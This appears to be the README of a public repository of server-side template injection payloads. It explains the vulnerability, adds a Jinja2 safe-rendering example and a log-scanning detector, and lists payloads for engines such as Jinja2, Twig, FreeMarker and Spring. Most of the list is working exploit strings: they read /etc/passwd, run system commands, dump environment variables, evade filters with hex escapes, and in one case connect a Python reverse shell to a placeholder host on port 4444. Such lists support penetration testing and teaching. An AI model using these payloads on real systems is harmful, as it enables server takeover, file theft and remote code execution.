payloadbox / Ssti Payloads

Licence: MIT
🎯 Server Side Template Injection Payloads

Server Side Template Injection Payloads

Server-side template injection occurs when an attacker is able to use native template syntax to inject a malicious payload into a template, which is then executed server-side.

Template engines are designed to generate web pages by combining fixed templates with volatile data. Server-side template injection attacks can occur when user input is concatenated directly into a template, rather than passed in as data. This allows attackers to inject arbitrary template directives in order to manipulate the template engine, often enabling them to take complete control of the server. As the name suggests, server-side template injection payloads are delivered and evaluated server-side, potentially making them much more dangerous than a typical client-side template injection.
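
The difference between concatenating input into a template and passing it in as data, shown with Jinja2 and the arithmetic probe `{{3*3}}`. This is an added example, not code from the payloadbox repository; the function names are hypothetical and it assumes the `jinja2` package is installed.

```python
from jinja2 import Environment
from jinja2.exceptions import SecurityError
from jinja2.sandbox import SandboxedEnvironment

env = Environment(autoescape=True)


def greet_vulnerable(name: str) -> str:
    # Vulnerable: user input is concatenated into the template source, so the
    # engine parses and evaluates any directives it contains.
    return env.from_string("Hello " + name + "!").render()


def greet_safe(name: str) -> str:
    # Fixed: the template source is constant and the input is passed in as
    # data, so the engine only ever handles it as a string value.
    return env.from_string("Hello {{ name }}!").render(name=name)


def render_user_template(source: str) -> str:
    # If users must be able to supply template source, compile it in the
    # sandbox, which refuses access to underscore-prefixed attributes.
    try:
        return SandboxedEnvironment(autoescape=True).from_string(source).render()
    except SecurityError:
        return "[blocked by sandbox]"


if __name__ == "__main__":
    probe = "{{3*3}}"  # arithmetic probe
    print(greet_vulnerable(probe))  # directive is evaluated by the engine
    print(greet_safe(probe))        # directive is echoed back as plain text
    print(render_user_template("{{ ''.__class__.__mro__ }}"))
```

Note that `autoescape=True` is enabled in both functions and does not prevent the injection; only keeping user input out of the template source does.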

Impact :

Server-side template injection vulnerabilities can expose websites to a variety of attacks depending on the template engine in question and how exactly the application uses it. In certain rare circumstances, these vulnerabilities pose no real security risk. However, most of the time, the impact of server-side template injection can be catastrophic.

At the severe end of the scale, an attacker can potentially achieve remote code execution, taking full control of the backend server and using it to perform other attacks on internal infrastructure.

Even in cases where full remote code execution is not possible, an attacker can often still use server-side template injection as the basis for numerous other attacks, potentially gaining read access to sensitive data and arbitrary files on the server.

Payloads :

{{2*2}}[[3*3]]
{{3*3}}
{{3*'3'}}
<%= 3 * 3 %>
${6*6}
${{3*3}}
@(6+5)
#{3*3}
#{ 3 * 3 }
{{dump(app)}}
{{app.request.server.all|join(',')}}
{{config.items()}}
{{ [].class.base.subclasses() }}
{{''.class.mro()[1].subclasses()}}
{{ ''.__class__.__mro__[2].__subclasses__() }}
{% for key, value in config.iteritems() %}<dt>{{ key|e }}</dt><dd>{{ value|e }}</dd>{% endfor %}
{{'a'.toUpperCase()}} 
{{ request }}
{{self}}
<%= File.open('/etc/passwd').read %>
<#assign ex = "freemarker.template.utility.Execute"?new()>${ ex("id")}
[#assign ex = 'freemarker.template.utility.Execute'?new()]${ ex('id')}
${"freemarker.template.utility.Execute"?new()("id")}
{{app.request.query.filter(0,0,1024,{'options':'system'})}}
{{ ''.__class__.__mro__[2].__subclasses__()[40]('/etc/passwd').read() }}
{{ config.items()[4][1].__class__.__mro__[2].__subclasses__()[40]("/etc/passwd").read() }}
{{''.__class__.mro()[1].__subclasses__()[396]('cat flag.txt',shell=True,stdout=-1).communicate()[0].strip()}}
{{config.__class__.__init__.__globals__['os'].popen('ls').read()}}
{% for x in ().__class__.__base__.__subclasses__() %}{% if "warning" in x.__name__ %}{{x()._module.__builtins__['__import__']('os').popen(request.args.input).read()}}{%endif%}{%endfor%}
{$smarty.version}
{php}echo `id`;{/php}
{{['id']|filter('system')}}
{{['cat\x20/etc/passwd']|filter('system')}}
{{['cat$IFS/etc/passwd']|filter('system')}}
{{request|attr([request.args.usc*2,request.args.class,request.args.usc*2]|join)}}
{{request|attr(["_"*2,"class","_"*2]|join)}}
{{request|attr(["__","class","__"]|join)}}
{{request|attr("__class__")}}
{{request.__class__}}
{{request|attr('application')|attr('\x5f\x5fglobals\x5f\x5f')|attr('\x5f\x5fgetitem\x5f\x5f')('\x5f\x5fbuiltins\x5f\x5f')|attr('\x5f\x5fgetitem\x5f\x5f')('\x5f\x5fimport\x5f\x5f')('os')|attr('popen')('id')|attr('read')()}}
{{'a'.getClass().forName('javax.script.ScriptEngineManager').newInstance().getEngineByName('JavaScript').eval(\"new java.lang.String('xxx')\")}}
{{'a'.getClass().forName('javax.script.ScriptEngineManager').newInstance().getEngineByName('JavaScript').eval(\"var x=new java.lang.ProcessBuilder; x.command(\\\"whoami\\\"); x.start()\")}}
{{'a'.getClass().forName('javax.script.ScriptEngineManager').newInstance().getEngineByName('JavaScript').eval(\"var x=new java.lang.ProcessBuilder; x.command(\\\"netstat\\\"); org.apache.commons.io.IOUtils.toString(x.start().getInputStream())\")}}
{{'a'.getClass().forName('javax.script.ScriptEngineManager').newInstance().getEngineByName('JavaScript').eval(\"var x=new java.lang.ProcessBuilder; x.command(\\\"uname\\\",\\\"-a\\\"); org.apache.commons.io.IOUtils.toString(x.start().getInputStream())\")}}
{% for x in ().__class__.__base__.__subclasses__() %}{% if "warning" in x.__name__ %}{{x()._module.__builtins__['__import__']('os').popen("python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\"ip\",4444));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call([\"/bin/cat\", \"flag.txt\"]);'").read().zfill(417)}}{%endif%}{% endfor %}
${T(java.lang.System).getenv()}
${T(java.lang.Runtime).getRuntime().exec('cat etc/passwd')}
${T(org.apache.commons.io.IOUtils).toString(T(java.lang.Runtime).getRuntime().exec(T(java.lang.Character).toString(99).concat(T(java.lang.Character).toString(97)).concat(T(java.lang.Character).toString(116)).concat(T(java.lang.Character).toString(32)).concat(T(java.lang.Character).toString(47)).concat(T(java.lang.Character).toString(101)).concat(T(java.lang.Character).toString(116)).concat(T(java.lang.Character).toString(99)).concat(T(java.lang.Character).toString(47)).concat(T(java.lang.Character).toString(112)).concat(T(java.lang.Character).toString(97)).concat(T(java.lang.Character).toString(115)).concat(T(java.lang.Character).toString(115)).concat(T(java.lang.Character).toString(119)).concat(T(java.lang.Character).toString(100))).getInputStream())}
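
A defender's view of the list above: this added sketch (not part of the payloadbox repository) scans access-log query strings for the template delimiters the list uses and separates arithmetic probes from entries that reach for objects, files or commands. The log lines, the `/greet` endpoint and all function names are constructed for illustration; values are decoded repeatedly before matching because the list itself contains hex-escaped underscores.

```python
import re
from urllib.parse import parse_qsl, quote, unquote, urlsplit

# Delimiter families taken from the payload list above.
DELIMITERS = {
    "{{ }} or {% %}": re.compile(r"\{\{.*?\}\}|\{%.*?%\}", re.S),
    "${ } or #{ }": re.compile(r"[$#]\{.*?\}", re.S),
    "<%= %>": re.compile(r"<%=.*?%>", re.S),
    "@( )": re.compile(r"@\(.*?\)"),
    "FreeMarker/Smarty tag": re.compile(r"[<\[]#assign\b|\{\$smarty\.|\{php\}"),
}
# Tokens from the same list that go past arithmetic: object graph, files, commands.
ESCALATION = re.compile(r"__\w+?__|\|\s*(?:attr|filter)\(|freemarker\.template\.utility"
                        r"|T\(java\.lang\.|getClass\(\)|File\.open|\{php\}")
REQUEST = re.compile(r'"(?:GET|POST) (\S+) HTTP/[\d.]+"')

def normalize(value, rounds=3):
    # Undo nested percent-encoding, then \xNN escapes such as \x5f.
    for _ in range(rounds):
        value = unquote(value)
    return re.sub(r"\\x([0-9a-fA-F]{2})", lambda m: chr(int(m.group(1), 16)), value)

def classify(value):  # -> (severity, matched delimiter families)
    text = normalize(value)
    families = [name for name, rx in DELIMITERS.items() if rx.search(text)]
    severity = "clean" if not families else "escalation" if ESCALATION.search(text) else "probe"
    return severity, families

def scan(log_lines):  # -> [(line number, parameter, severity, families)]
    findings = []
    for number, line in enumerate(log_lines, 1):
        match = REQUEST.search(line)
        query = urlsplit(match.group(1)).query if match else ""
        for key, value in parse_qsl(query):
            verdict = classify(value)
            if verdict[0] != "clean":
                findings.append((number, key, *verdict))
    return findings

_FMT = '203.0.113.5 - - [01/Jan/2024:10:00:00 +0000] "GET /greet?name={} HTTP/1.1" 200 12'
SAMPLE_LOG = [  # constructed sample lines, not real traffic
    _FMT.format("alice"),
    _FMT.format(quote("{{3*3}}", safe="")),
    _FMT.format(quote(quote(r"{{request|attr('\x5f\x5fclass\x5f\x5f')}}", safe=""), safe="")),
    _FMT.format(quote("${6*6}", safe="")),
]

if __name__ == "__main__":
    print(*scan(SAMPLE_LOG), sep="\n")
```

A match is a lead for review rather than proof of exploitation: applications that legitimately carry client-side `{{ }}` syntax in parameters will also match.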

References :

Cloning an Existing Repository ( Clone with HTTPS )
git clone https://github.com/payloadbox/ssti-payloads.git
Cloning an Existing Repository ( Clone with SSH )
git clone git@github.com:payloadbox/ssti-payloads.git
